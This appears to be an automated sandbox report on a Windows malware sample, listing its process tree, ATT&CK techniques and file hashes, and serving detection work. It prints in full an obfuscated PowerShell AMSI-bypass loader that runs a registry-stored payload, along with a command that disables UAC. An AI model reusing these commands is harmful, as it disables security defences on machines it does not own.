C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UJGBdwJXtfRo{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$SRiEylPZlbiHiq,[Parameter(Position=1)][Type]$enorOHvMlz)$npppGbcUvOH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+'e'+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+'e'+''+[Char](108)+'e'+'g'+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+'M'+'e'+[Char](109)+'o'+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+'ele'+[Char](103)+''+'a'+'t'+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+'l'+'e'+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+','+[Char](65)+''+'u'+'t'+[Char](111)+''+[Char](67)+'l'+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$npppGbcUvOH.DefineConstructor(''+'R'+'TS'+[Char](112)+''+'e'+''+'c'+'ial'+[Char](78)+'a'+'m'+'e'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$SRiEylPZlbiHiq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');$npppGbcUvOH.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'','Pu'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Ne'+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+'r'+'t'+''+'u'+''+'a'+'l',$enorOHvMlz,$SRiEylPZlbiHiq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+'i'+'m'+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $npppGbcUvOH.CreateType();}$YDUBloJTkaYKF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.'+'d'+''+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+''+[Char](114)+'o'+'s'+'o'+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n3'+[Char](50)+''+[Char](46)+'Un'+'s'+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+''+'a'+''+'t'+'ive'+[Char](77)+''+[Char](101)+''+'t'+''+'h'+''+[Char](111)+''+[Char](100)+'s');$ztKazITxlsxKfh=$YDUBloJTkaYKF.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+'A'+[Char](100)+''+[Char](100)+''+'r'+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+'tat'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$wEVvAxDshGqvjfKSWYb=UJGBdwJXtfRo @([String])([IntPtr]);$WFqVXeCjASwFAmjlInSZgs=UJGBdwJXtfRo @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LtYYoegEWUH=$YDUBloJTkaYKF.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+'o'+[Char](100)+'ul'+[Char](101)+'H'+'a'+''+'n'+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+'l')));$yZHVLTApDGCnfW=$ztKazITxlsxKfh.Invoke($Null,@([Object]$LtYYoegEWUH,[Object]('Load'+[Char](76)+''+[Char](105)+''+'b'+''+'r'+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$SjhyEIBJhGvjiNZqM=$ztKazITxlsxKfh.Invoke($Null,@([Object]$LtYYoegEWUH,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'ual'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'ec'+[Char](116)+'')));$ssSwLbF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yZHVLTApDGCnfW,$wEVvAxDshGqvjfKSWYb).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+'.'+'dl'+[Char](108)+'');$GdOVJArTfGwGqKDcm=$ztKazITxlsxKfh.Invoke($Null,@([Object]$ssSwLbF,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+''+[Char](102)+'er')));$wAZYPTjEMh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SjhyEIBJhGvjiNZqM,$WFqVXeCjASwFAmjlInSZgs).Invoke($GdOVJArTfGwGqKDcm,[uint32]8,4,[ref]$wAZYPTjEMh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GdOVJArTfGwGqKDcm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SjhyEIBJhGvjiNZqM,$WFqVXeCjASwFAmjlInSZgs).Invoke($GdOVJArTfGwGqKDcm,[uint32]8,0x20,[ref]$wAZYPTjEMh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+'T'+'W'+[Char](65)+'R'+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+'7s'+[Char](116)+''+'a'+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:2996 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5020
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1376
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:1288
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1528
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1664
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1812
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2012
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2068
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2376
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2412
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2644
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2660
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2712
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3236
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3388 -
C:\Users\Admin\AppData\Local\Temp\stub.exe"C:\Users\Admin\AppData\Local\Temp\stub.exe"2⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2744
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5076
-
-
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"3⤵
- Adds policy Run key to start application
- Deletes itself
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4516
-
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2564
-
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe4⤵PID:1272
-
-
C:\Users\Admin\Downloads\Install.exe"C:\Users\Admin\Downloads\Install.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1080
-
-
C:\Users\Admin\Downloads\Install.exe"C:\Users\Admin\Downloads\Install.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3772
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3680
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-
C:\Users\Admin\Downloads\Install.exe"C:\Users\Admin\Downloads\Install.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4244
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
PID:2836
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3548
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3752
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3908
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3400
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:5068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:632
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3356
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1576
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4876
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:2800
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:3808
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:1780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:1052
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:3120
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:2036
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3484
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3340
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:4988
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
1Clear Windows Event Logs
1Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
483KB
MD5f1afd76730a4e93f02f5a0daeb633bbe
SHA14c9f2260dfb5ece37ccaf4243d88de9e936bcbc1
SHA256a83a7031d0e70716aec25fd334e0dea863b3696eb374bf0546e9948bccfbd84a
SHA512d353953d07f9a987909d8cfe43e7a127c3f381560a3ced54bf848f107664f4c4b4682e9f3c7c7188abaef2b75686357b836319359807d7847dd4070a28a6a07e
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
163KB
MD51a7d1b5d24ba30c4d3d5502295ab5e89
SHA12d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5aa187cac09f051e24146ad549a0f08a6
SHA12ef7fae3652bb838766627fa6584a6e3b5e74ff3
SHA2567036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
SHA512960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD536fea3c7bd7bf5f15ee1a748daae1f24
SHA1c5e0122744a61d18b64126bf35374e29ecfe7553
SHA256bec6c6166fb67f7866ad5dad460b9212b3fe6a2f909638ec9abe465c6199ade4
SHA5126ded68570e0234e985f5a58307e25f94e9980de39d306e16ab02d89f67b701c129ac740f48bc7f22a5befe78cbfe56bd76a31a12d17ffc973be1a8a3079de4c1